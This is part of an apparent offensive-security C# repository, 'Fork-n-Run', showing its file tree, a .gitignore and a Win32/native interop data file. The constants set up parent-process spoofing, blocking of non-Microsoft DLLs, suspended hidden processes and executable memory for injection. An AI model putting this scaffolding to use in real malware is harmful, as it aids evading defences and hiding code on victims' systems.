├── .gitattributes ├── .gitignore ├── DemoApp ├── DInvoke │ ├── Data.cs │ ├── Delegates.cs │ ├── Generic.cs │ ├── Native.cs │ └── Win32.cs ├── Deception │ └── Mole.cs ├── DemoApp.csproj ├── Injection │ └── Needle.cs ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Sacrificial │ └── Lamb.cs └── app.config ├── DemoAssembly ├── DemoAssembly.csproj ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── Fork-n-Run.sln └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.tlog 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Nuget personal access tokens and Credentials 210 | # nuget.config 211 | 212 | # Microsoft Azure Build Output 213 | csx/ 214 | *.build.csdef 215 | 216 | # Microsoft Azure Emulator 217 | ecf/ 218 | rcf/ 219 | 220 | # Windows Store app package directories and files 221 | AppPackages/ 222 | BundleArtifacts/ 223 | Package.StoreAssociation.xml 224 | _pkginfo.txt 225 | *.appx 226 | *.appxbundle 227 | *.appxupload 228 | 229 | # Visual Studio cache files 230 | # files ending in .cache can be ignored 231 | *.[Cc]ache 232 | # but keep track of directories ending in .cache 233 | !?*.[Cc]ache/ 234 | 235 | # Others 236 | ClientBin/ 237 | ~$* 238 | *~ 239 | *.dbmdl 240 | *.dbproj.schemaview 241 | *.jfm 242 | *.pfx 243 | *.publishsettings 244 | orleans.codegen.cs 245 | 246 | # Including strong name files can present a security risk 247 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 248 | #*.snk 249 | 250 | # Since there are multiple workflows, uncomment next line to ignore bower_components 251 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 252 | #bower_components/ 253 | 254 | # RIA/Silverlight projects 255 | Generated_Code/ 256 | 257 | # Backup & report files from converting an old project file 258 | # to a newer Visual Studio version. Backup files are not needed, 259 | # because we have git ;-) 260 | _UpgradeReport_Files/ 261 | Backup*/ 262 | UpgradeLog*.XML 263 | UpgradeLog*.htm 264 | ServiceFabricBackup/ 265 | *.rptproj.bak 266 | 267 | # SQL Server files 268 | *.mdf 269 | *.ldf 270 | *.ndf 271 | 272 | # Business Intelligence projects 273 | *.rdl.data 274 | *.bim.layout 275 | *.bim_*.settings 276 | *.rptproj.rsuser 277 | *- [Bb]ackup.rdl 278 | *- [Bb]ackup ([0-9]).rdl 279 | *- [Bb]ackup ([0-9][0-9]).rdl 280 | 281 | # Microsoft Fakes 282 | FakesAssemblies/ 283 | 284 | # GhostDoc plugin setting file 285 | *.GhostDoc.xml 286 | 287 | # Node.js Tools for Visual Studio 288 | .ntvs_analysis.dat 289 | node_modules/ 290 | 291 | # Visual Studio 6 build log 292 | *.plg 293 | 294 | # Visual Studio 6 workspace options file 295 | *.opt 296 | 297 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 298 | *.vbw 299 | 300 | # Visual Studio LightSwitch build output 301 | **/*.HTMLClient/GeneratedArtifacts 302 | **/*.DesktopClient/GeneratedArtifacts 303 | **/*.DesktopClient/ModelManifest.xml 304 | **/*.Server/GeneratedArtifacts 305 | **/*.Server/ModelManifest.xml 306 | _Pvt_Extensions 307 | 308 | # Paket dependency manager 309 | .paket/paket.exe 310 | paket-files/ 311 | 312 | # FAKE - F# Make 313 | .fake/ 314 | 315 | # CodeRush personal settings 316 | .cr/personal 317 | 318 | # Python Tools for Visual Studio (PTVS) 319 | __pycache__/ 320 | *.pyc 321 | 322 | # Cake - Uncomment if you are using it 323 | # tools/** 324 | # !tools/packages.config 325 | 326 | # Tabs Studio 327 | *.tss 328 | 329 | # Telerik's JustMock configuration file 330 | *.jmconfig 331 | 332 | # BizTalk build output 333 | *.btp.cs 334 | *.btm.cs 335 | *.odx.cs 336 | *.xsd.cs 337 | 338 | # OpenCover UI analysis results 339 | OpenCover/ 340 | 341 | # Azure Stream Analytics local run output 342 | ASALocalRun/ 343 | 344 | # MSBuild Binary and Structured Log 345 | *.binlog 346 | 347 | # NVidia Nsight GPU debugger configuration file 348 | *.nvuser 349 | 350 | # MFractors (Xamarin productivity tool) working folder 351 | .mfractor/ 352 | 353 | # Local History for Visual Studio 354 | .localhistory/ 355 | 356 | # BeatPulse healthcheck temp database 357 | healthchecksdb 358 | 359 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 360 | MigrationBackup/ 361 | 362 | # Ionide (cross platform F# VS Code tools) working folder 363 | .ionide/ 364 | 365 | # Fody - auto-generated XML schema 366 | FodyWeavers.xsd 367 | 368 | # VS Code files for those working on multiple tools 369 | .vscode/* 370 | !.vscode/settings.json 371 | !.vscode/tasks.json 372 | !.vscode/launch.json 373 | !.vscode/extensions.json 374 | *.code-workspace 375 | 376 | # Local History for Visual Studio Code 377 | .history/ 378 | 379 | # Windows Installer files from build outputs 380 | *.cab 381 | *.msi 382 | *.msix 383 | *.msm 384 | *.msp 385 | 386 | # JetBrains Rider 387 | .idea/ 388 | *.sln.iml 389 | -------------------------------------------------------------------------------- /DemoApp/DInvoke/Data.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace DemoApp.DInvoke 5 | { 6 | public static class Data 7 | { 8 | public static class Win32 9 | { 10 | public const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000; 11 | public const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007; 12 | 13 | public const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000; 14 | 15 | public const int STARTF_USESTDHANDLES = 0x00000100; 16 | public const int STARTF_USESHOWWINDOW = 0x00000001; 17 | public const ushort SW_HIDE = 0x0000; 18 | 19 | public const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000; 20 | public const uint CREATE_NO_WINDOW = 0x08000000; 21 | public const uint CREATE_SUSPENDED = 0x00000004; 22 | 23 | public static uint MEM_COMMIT = 0x1000; 24 | public static uint MEM_RESERVE = 0x2000; 25 | 26 | public const uint PAGE_READWRITE = 0x04; 27 | public const uint PAGE_EXECUTE_READWRITE = 0x40; 28 | 29 | [StructLayout(LayoutKind.Sequential)] 30 | public struct SECURITY_ATTRIBUTES 31 | { 32 | public uint nLength; 33 | public IntPtr lpSecurityDescriptor; 34 | public bool bInheritHandle; 35 | } 36 | 37 | [StructLayout(LayoutKind.Sequential)] 38 | public struct STARTUPINFO 39 | { 40 | public uint cb; 41 | public string lpReserved; 42 | public string lpDesktop; 43 | public string lpTitle; 44 | public uint dwX; 45 | public uint dwY; 46 | public uint dwXSize; 47 | public uint dwYSize; 48 | public uint dwXCountChars; 49 | public uint dwYCountChars; 50 | public uint dwFillAttribute; 51 | public uint dwFlags; 52 | public ushort wShowWindow; 53 | public ushort cbReserved2; 54 | public IntPtr lpReserved2; 55 | public IntPtr hStdInput; 56 | public IntPtr hStdOutput; 57 | public IntPtr hStdError; 58 | } 59 | 60 | [StructLayout(LayoutKind.Sequential)] 61 | public struct STARTUPINFOEX 62 | { 63 | public STARTUPINFO Startupinfo; 64 | public IntPtr lpAttributeList; 65 | } 66 | 67 | [StructLayout(LayoutKind.Sequential)] 68 | public struct PROCESS_INFORMATION 69 | { 70 | public IntPtr hProcess; 71 | public IntPtr hThread; 72 | public uint dwProcessId; 73 | public uint dwThreadId; 74 | } 75 | 76 | [Flags] 77 | public enum DuplicateOptions : uint 78 | { 79 | DuplicateCloseSource = 0x00000001, 80 | DuplicateSameAccess = 0x00000002 81 | } 82 | 83 | [Flags] 84 | public enum HandleFlags : uint 85 | { 86 | None = 0, 87 | Inherit = 1, 88 | ProtectFromClose = 2 89 | } 90 | 91 | [Flags] 92 | public enum ACCESS_MASK : uint 93 | { 94 | DELETE = 0x00010000, 95 | READ_CONTROL = 0x00020000, 96 | WRITE_DAC = 0x00040000, 97 | WRITE_OWNER = 0x00080000, 98 | SYNCHRONIZE = 0x00100000, 99 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 100 | STANDARD_RIGHTS_READ = 0x00020000, 101 | STANDARD_RIGHTS_WRITE = 0x00020000, 102 | STANDARD_RIGHTS_EXECUTE = 0x00020000, 103 | STANDARD_RIGHTS_ALL = 0x001F0000, 104 | SPECIFIC_RIGHTS_ALL = 0x0000FFF, 105 | ACCESS_SYSTEM_SECURITY = 0x01000000, 106 | MAXIMUM_ALLOWED = 0x02000000, 107 | GENERIC_READ = 0x80000000, 108 | GENERIC_WRITE = 0x40000000, 109 | GENERIC_EXECUTE = 0x20000000, 110 | GENERIC_ALL = 0x10000000, 111 | DESKTOP_READOBJECTS = 0x00000001, 112 | DESKTOP_CREATEWINDOW = 0x00000002, 113 | DESKTOP_CREATEMENU = 0x00000004, 114 | DESKTOP_HOOKCONTROL = 0x00000008, 115 | DESKTOP_JOURNALRECORD = 0x00000010, 116 | DESKTOP_JOURNALPLAYBACK = 0x00000020, 117 | DESKTOP_ENUMERATE = 0x00000040, 118 | DESKTOP_WRITEOBJECTS = 0x00000080, 119 | DESKTOP_SWITCHDESKTOP = 0x00000100, 120 | WINSTA_ENUMDESKTOPS = 0x00000001, 121 | WINSTA_READATTRIBUTES = 0x00000002, 122 | WINSTA_ACCESSCLIPBOARD = 0x00000004, 123 | WINSTA_CREATEDESKTOP = 0x00000008, 124 | WINSTA_WRITEATTRIBUTES = 0x00000010, 125 | WINSTA_ACCESSGLOBALATOMS = 0x00000020, 126 | WINSTA_EXITWINDOWS = 0x00000040, 127 | WINSTA_ENUMERATE = 0x00000100, 128 | WINSTA_READSCREEN = 0x00000200, 129 | WINSTA_ALL_ACCESS = 0x0000037F, 130 | 131 | SECTION_ALL_ACCESS = 0x10000000, 132 | SECTION_QUERY = 0x0001, 133 | SECTION_MAP_WRITE = 0x0002, 134 | SECTION_MAP_READ = 0x0004, 135 | SECTION_MAP_EXECUTE = 0x0008, 136 | SECTION_EXTEND_SIZE = 0x0010 137 | }; 138 | } 139 | 140 | public static class Native 141 | { 142 | [StructLayout(LayoutKind.Sequential)] 143 | public struct UNICODE_STRING 144 | { 145 | public UInt16 Length; 146 | public UInt16 MaximumLength; 147 | public IntPtr Buffer; 148 | } 149 | 150 | public struct PROCESS_BASIC_INFORMATION 151 | { 152 | public IntPtr ExitStatus; 153 | public IntPtr PebBaseAddress; 154 | public IntPtr AffinityMask; 155 | public IntPtr BasePriority; 156 | public UIntPtr UniqueProcessId; 157 | public int InheritedFromUniqueProcessId; 158 | 159 | public int Size 160 | { 161 | get { return (int)Marshal.SizeOf(typeof(PROCESS_BASIC_INFORMATION)); } 162 | } 163 | } 164 | 165 | public enum PROCESSINFOCLASS : int 166 | { 167 | ProcessBasicInformation = 0, // 0, q: PROCESS_BASIC_INFORMATION, PROCESS_EXTENDED_BASIC_INFORMATION 168 | ProcessQuotaLimits, // qs: QUOTA_LIMITS, QUOTA_LIMITS_EX 169 | ProcessIoCounters, // q: IO_COUNTERS 170 | ProcessVmCounters, // q: VM_COUNTERS, VM_COUNTERS_EX 171 | ProcessTimes, // q: KERNEL_USER_TIMES 172 | ProcessBasePriority, // s: KPRIORITY 173 | ProcessRaisePriority, // s: ULONG 174 | ProcessDebugPort, // q: HANDLE 175 | ProcessExceptionPort, // s: HANDLE 176 | ProcessAccessToken, // s: PROCESS_ACCESS_TOKEN 177 | ProcessLdtInformation, // 10 178 | ProcessLdtSize, 179 | ProcessDefaultHardErrorMode, // qs: ULONG 180 | ProcessIoPortHandlers, // (kernel-mode only) 181 | ProcessPooledUsageAndLimits, // q: POOLED_USAGE_AND_LIMITS 182 | ProcessWorkingSetWatch, // q: PROCESS_WS_WATCH_INFORMATION[]; s: void 183 | ProcessUserModeIOPL, 184 | ProcessEnableAlignmentFaultFixup, // s: BOOLEAN 185 | ProcessPriorityClass, // qs: PROCESS_PRIORITY_CLASS 186 | ProcessWx86Information, 187 | ProcessHandleCount, // 20, q: ULONG, PROCESS_HANDLE_INFORMATION 188 | ProcessAffinityMask, // s: KAFFINITY 189 | ProcessPriorityBoost, // qs: ULONG 190 | ProcessDeviceMap, // qs: PROCESS_DEVICEMAP_INFORMATION, PROCESS_DEVICEMAP_INFORMATION_EX 191 | ProcessSessionInformation, // q: PROCESS_SESSION_INFORMATION 192 | ProcessForegroundInformation, // s: PROCESS_FOREGROUND_BACKGROUND 193 | ProcessWow64Information, // q: ULONG_PTR 194 | ProcessImageFileName, // q: UNICODE_STRING 195 | ProcessLUIDDeviceMapsEnabled, // q: ULONG 196 | ProcessBreakOnTermination, // qs: ULONG 197 | ProcessDebugObjectHandle, // 30, q: HANDLE 198 | ProcessDebugFlags, // qs: ULONG 199 | ProcessHandleTracing, // q: PROCESS_HANDLE_TRACING_QUERY; s: size 0 disables, otherwise enables 200 | ProcessIoPriority, // qs: ULONG 201 | ProcessExecuteFlags, // qs: ULONG 202 | ProcessResourceManagement, 203 | ProcessCookie, // q: ULONG 204 | ProcessImageInformation, // q: SECTION_IMAGE_INFORMATION 205 | ProcessCycleTime, // q: PROCESS_CYCLE_TIME_INFORMATION 206 | ProcessPagePriority, // q: ULONG 207 | ProcessInstrumentationCallback, // 40 208 | ProcessThreadStackAllocation, // s: PROCESS_STACK_ALLOCATION_INFORMATION, PROCESS_STACK_ALLOCATION_INFORMATION_EX 209 | ProcessWorkingSetWatchEx, // q: PROCESS_WS_WATCH_INFORMATION_EX[] 210 | ProcessImageFileNameWin32, // q: UNICODE_STRING 211 | ProcessImageFileMapping, // q: HANDLE (input) 212 | ProcessAffinityUpdateMode, // qs: PROCESS_AFFINITY_UPDATE_MODE 213 | ProcessMemoryAllocationMode, // qs: PROCESS_MEMORY_ALLOCATION_MODE 214 | ProcessGroupInformation, // q: USHORT[] 215 | ProcessTokenVirtualizationEnabled, // s: ULONG 216 | ProcessConsoleHostProcess, // q: ULONG_PTR 217 | ProcessWindowInformation, // 50, q: PROCESS_WINDOW_INFORMATION 218 | ProcessHandleInformation, // q: PROCESS_HANDLE_SNAPSHOT_INFORMATION // since WIN8 219 | ProcessMitigationPolicy, // s: PROCESS_MITIGATION_POLICY_INFORMATION 220 | ProcessDynamicFunctionTableInformation, 221 | ProcessHandleCheckingMode, 222 | ProcessKeepAliveCount, // q: PROCESS_KEEPALIVE_COUNT_INFORMATION 223 | ProcessRevokeFileHandles, // s: PROCESS_REVOKE_FILE_HANDLES_INFORMATION 224 | MaxProcessInfoClass 225 | }; 226 | 227 | [StructLayout(LayoutKind.Sequential)] 228 | public struct LIST_ENTRY 229 | { 230 | public IntPtr Flink; 231 | public IntPtr Blink; 232 | } 233 | 234 | public enum NTSTATUS : uint 235 | { 236 | // Success 237 | Success = 0x00000000, 238 | Wait0 = 0x00000000, 239 | Wait1 = 0x00000001, 240 | Wait2 = 0x00000002, 241 | Wait3 = 0x00000003, 242 | Wait63 = 0x0000003f, 243 | Abandoned = 0x00000080, 244 | AbandonedWait0 = 0x00000080, 245 | AbandonedWait1 = 0x00000081, 246 | AbandonedWait2 = 0x00000082, 247 | AbandonedWait3 = 0x00000083, 248 | AbandonedWait63 = 0x000000bf, 249 | UserApc = 0x000000c0, 250 | KernelApc = 0x00000100, 251 | Alerted = 0x00000101, 252 | Timeout = 0x00000102, 253 | Pending = 0x00000103, 254 | Reparse = 0x00000104, 255 | MoreEntries = 0x00000105, 256 | NotAllAssigned = 0x00000106, 257 | SomeNotMapped = 0x00000107, 258 | OpLockBreakInProgress = 0x00000108, 259 | VolumeMounted = 0x00000109, 260 | RxActCommitted = 0x0000010a, 261 | NotifyCleanup = 0x0000010b, 262 | NotifyEnumDir = 0x0000010c, 263 | NoQuotasForAccount = 0x0000010d, 264 | PrimaryTransportConnectFailed = 0x0000010e, 265 | PageFaultTransition = 0x00000110, 266 | PageFaultDemandZero = 0x00000111, 267 | PageFaultCopyOnWrite = 0x00000112, 268 | PageFaultGuardPage = 0x00000113, 269 | PageFaultPagingFile = 0x00000114, 270 | CrashDump = 0x00000116, 271 | ReparseObject = 0x00000118, 272 | NothingToTerminate = 0x00000122, 273 | ProcessNotInJob = 0x00000123, 274 | ProcessInJob = 0x00000124, 275 | ProcessCloned = 0x00000129, 276 | FileLockedWithOnlyReaders = 0x0000012a, 277 | FileLockedWithWriters = 0x0000012b, 278 | 279 | // Informational 280 | Informational = 0x40000000, 281 | ObjectNameExists = 0x40000000, 282 | ThreadWasSuspended = 0x40000001, 283 | WorkingSetLimitRange = 0x40000002, 284 | ImageNotAtBase = 0x40000003, 285 | RegistryRecovered = 0x40000009, 286 | 287 | // Warning 288 | Warning = 0x80000000, 289 | GuardPageViolation = 0x80000001, 290 | DatatypeMisalignment = 0x80000002, 291 | Breakpoint = 0x80000003, 292 | SingleStep = 0x80000004, 293 | BufferOverflow = 0x80000005, 294 | NoMoreFiles = 0x80000006, 295 | HandlesClosed = 0x8000000a, 296 | PartialCopy = 0x8000000d, 297 | DeviceBusy = 0x80000011, 298 | InvalidEaName = 0x80000013, 299 | EaListInconsistent = 0x80000014, 300 | NoMoreEntries = 0x8000001a, 301 | LongJump = 0x80000026, 302 | DllMightBeInsecure = 0x8000002b, 303 | 304 | // Error 305 | Error = 0xc0000000, 306 | Unsuccessful = 0xc0000001, 307 | NotImplemented = 0xc0000002, 308 | InvalidInfoClass = 0xc0000003, 309 | InfoLengthMismatch = 0xc0000004, 310 | AccessViolation = 0xc0000005, 311 | InPageError = 0xc0000006, 312 | PagefileQuota = 0xc0000007, 313 | InvalidHandle = 0xc0000008, 314 | BadInitialStack = 0xc0000009, 315 | BadInitialPc = 0xc000000a, 316 | InvalidCid = 0xc000000b, 317 | TimerNotCanceled = 0xc000000c, 318 | InvalidParameter = 0xc000000d, 319 | NoSuchDevice = 0xc000000e, 320 | NoSuchFile = 0xc000000f, 321 | InvalidDeviceRequest = 0xc0000010, 322 | EndOfFile = 0xc0000011, 323 | WrongVolume = 0xc0000012, 324 | NoMediaInDevice = 0xc0000013, 325 | NoMemory = 0xc0000017, 326 | ConflictingAddresses = 0xc0000018, 327 | NotMappedView = 0xc0000019, 328 | UnableToFreeVm = 0xc000001a, 329 | UnableToDeleteSection = 0xc000001b, 330 | IllegalInstruction = 0xc000001d, 331 | AlreadyCommitted = 0xc0000021, 332 | AccessDenied = 0xc0000022, 333 | BufferTooSmall = 0xc0000023, 334 | ObjectTypeMismatch = 0xc0000024, 335 | NonContinuableException = 0xc0000025, 336 | BadStack = 0xc0000028, 337 | NotLocked = 0xc000002a, 338 | NotCommitted = 0xc000002d, 339 | InvalidParameterMix = 0xc0000030, 340 | ObjectNameInvalid = 0xc0000033, 341 | ObjectNameNotFound = 0xc0000034, 342 | ObjectNameCollision = 0xc0000035, 343 | ObjectPathInvalid = 0xc0000039, 344 | ObjectPathNotFound = 0xc000003a, 345 | ObjectPathSyntaxBad = 0xc000003b, 346 | DataOverrun = 0xc000003c, 347 | DataLate = 0xc000003d, 348 | DataError = 0xc000003e, 349 | CrcError = 0xc000003f, 350 | SectionTooBig = 0xc0000040, 351 | PortConnectionRefused = 0xc0000041, 352 | InvalidPortHandle = 0xc0000042, 353 | SharingViolation = 0xc0000043, 354 | QuotaExceeded = 0xc0000044, 355 | InvalidPageProtection = 0xc0000045, 356 | MutantNotOwned = 0xc0000046, 357 | SemaphoreLimitExceeded = 0xc0000047, 358 | PortAlreadySet = 0xc0000048, 359 | SectionNotImage = 0xc0000049, 360 | SuspendCountExceeded = 0xc000004a, 361 | ThreadIsTerminating = 0xc000004b, 362 | BadWorkingSetLimit = 0xc000004c, 363 | IncompatibleFileMap = 0xc000004d, 364 | SectionProtection = 0xc000004e, 365 | EasNotSupported = 0xc000004f, 366 | EaTooLarge = 0xc0000050, 367 | NonExistentEaEntry = 0xc0000051, 368 | NoEasOnFile = 0xc0000052, 369 | EaCorruptError = 0xc0000053, 370 | FileLockConflict = 0xc0000054, 371 | LockNotGranted = 0xc0000055, 372 | DeletePending = 0xc0000056, 373 | CtlFileNotSupported = 0xc0000057, 374 | UnknownRevision = 0xc0000058, 375 | RevisionMismatch = 0xc0000059, 376 | InvalidOwner = 0xc000005a, 377 | InvalidPrimaryGroup = 0xc000005b, 378 | NoImpersonationToken = 0xc000005c, 379 | CantDisableMandatory = 0xc000005d, 380 | NoLogonServers = 0xc000005e, 381 | NoSuchLogonSession = 0xc000005f, 382 | NoSuchPrivilege = 0xc0000060, 383 | PrivilegeNotHeld = 0xc0000061, 384 | InvalidAccountName = 0xc0000062, 385 | UserExists = 0xc0000063, 386 | NoSuchUser = 0xc0000064, 387 | GroupExists = 0xc0000065, 388 | NoSuchGroup = 0xc0000066, 389 | MemberInGroup = 0xc0000067, 390 | MemberNotInGroup = 0xc0000068, 391 | LastAdmin = 0xc0000069, 392 | WrongPassword = 0xc000006a, 393 | IllFormedPassword = 0xc000006b, 394 | PasswordRestriction = 0xc000006c, 395 | LogonFailure = 0xc000006d, 396 | AccountRestriction = 0xc000006e, 397 | InvalidLogonHours = 0xc000006f, 398 | InvalidWorkstation = 0xc0000070, 399 | PasswordExpired = 0xc0000071, 400 | AccountDisabled = 0xc0000072, 401 | NoneMapped = 0xc0000073, 402 | TooManyLuidsRequested = 0xc0000074, 403 | LuidsExhausted = 0xc0000075, 404 | InvalidSubAuthority = 0xc0000076, 405 | InvalidAcl = 0xc0000077, 406 | InvalidSid = 0xc0000078, 407 | InvalidSecurityDescr = 0xc0000079, 408 | ProcedureNotFound = 0xc000007a, 409 | InvalidImageFormat = 0xc000007b, 410 | NoToken = 0xc000007c, 411 | BadInheritanceAcl = 0xc000007d, 412 | RangeNotLocked = 0xc000007e, 413 | DiskFull = 0xc000007f, 414 | ServerDisabled = 0xc0000080, 415 | ServerNotDisabled = 0xc0000081, 416 | TooManyGuidsRequested = 0xc0000082, 417 | GuidsExhausted = 0xc0000083, 418 | InvalidIdAuthority = 0xc0000084, 419 | AgentsExhausted = 0xc0000085, 420 | InvalidVolumeLabel = 0xc0000086, 421 | SectionNotExtended = 0xc0000087, 422 | NotMappedData = 0xc0000088, 423 | ResourceDataNotFound = 0xc0000089, 424 | ResourceTypeNotFound = 0xc000008a, 425 | ResourceNameNotFound = 0xc000008b, 426 | ArrayBoundsExceeded = 0xc000008c, 427 | FloatDenormalOperand = 0xc000008d, 428 | FloatDivideByZero = 0xc000008e, 429 | FloatInexactResult = 0xc000008f, 430 | FloatInvalidOperation = 0xc0000090, 431 | FloatOverflow = 0xc0000091, 432 | FloatStackCheck = 0xc0000092, 433 | FloatUnderflow = 0xc0000093, 434 | IntegerDivideByZero = 0xc0000094, 435 | IntegerOverflow = 0xc0000095, 436 | PrivilegedInstruction = 0xc0000096, 437 | TooManyPagingFiles = 0xc0000097, 438 | FileInvalid = 0xc0000098, 439 | InsufficientResources = 0xc000009a, 440 | InstanceNotAvailable = 0xc00000ab, 441 | PipeNotAvailable = 0xc00000ac, 442 | InvalidPipeState = 0xc00000ad, 443 | PipeBusy = 0xc00000ae, 444 | IllegalFunction = 0xc00000af, 445 | PipeDisconnected = 0xc00000b0, 446 | PipeClosing = 0xc00000b1, 447 | PipeConnected = 0xc00000b2, 448 | PipeListening = 0xc00000b3, 449 | InvalidReadMode = 0xc00000b4, 450 | IoTimeout = 0xc00000b5, 451 | FileForcedClosed = 0xc00000b6, 452 | ProfilingNotStarted = 0xc00000b7, 453 | ProfilingNotStopped = 0xc00000b8, 454 | NotSameDevice = 0xc00000d4, 455 | FileRenamed = 0xc00000d5, 456 | CantWait = 0xc00000d8, 457 | PipeEmpty = 0xc00000d9, 458 | CantTerminateSelf = 0xc00000db, 459 | InternalError = 0xc00000e5, 460 | InvalidParameter1 = 0xc00000ef, 461 | InvalidParameter2 = 0xc00000f0, 462 | InvalidParameter3 = 0xc00000f1, 463 | InvalidParameter4 = 0xc00000f2, 464 | InvalidParameter5 = 0xc00000f3, 465 | InvalidParameter6 = 0xc00000f4, 466 | InvalidParameter7 = 0xc00000f5, 467 | InvalidParameter8 = 0xc00000f6, 468 | InvalidParameter9 = 0xc00000f7, 469 | InvalidParameter10 = 0xc00000f8, 470 | InvalidParameter11 = 0xc00000f9, 471 | InvalidParameter12 = 0xc00000fa, 472 | ProcessIsTerminating = 0xc000010a, 473 | MappedFileSizeZero = 0xc000011e, 474 | TooManyOpenedFiles = 0xc000011f, 475 | Cancelled = 0xc0000120, 476 | CannotDelete = 0xc0000121, 477 | InvalidComputerName = 0xc0000122, 478 | FileDeleted = 0xc0000123, 479 | SpecialAccount = 0xc0000124, 480 | SpecialGroup = 0xc0000125, 481 | SpecialUser = 0xc0000126, 482 | MembersPrimaryGroup = 0xc0000127, 483 | FileClosed = 0xc0000128, 484 | TooManyThreads = 0xc0000129, 485 | ThreadNotInProcess = 0xc000012a, 486 | TokenAlreadyInUse = 0xc000012b, 487 | PagefileQuotaExceeded = 0xc000012c, 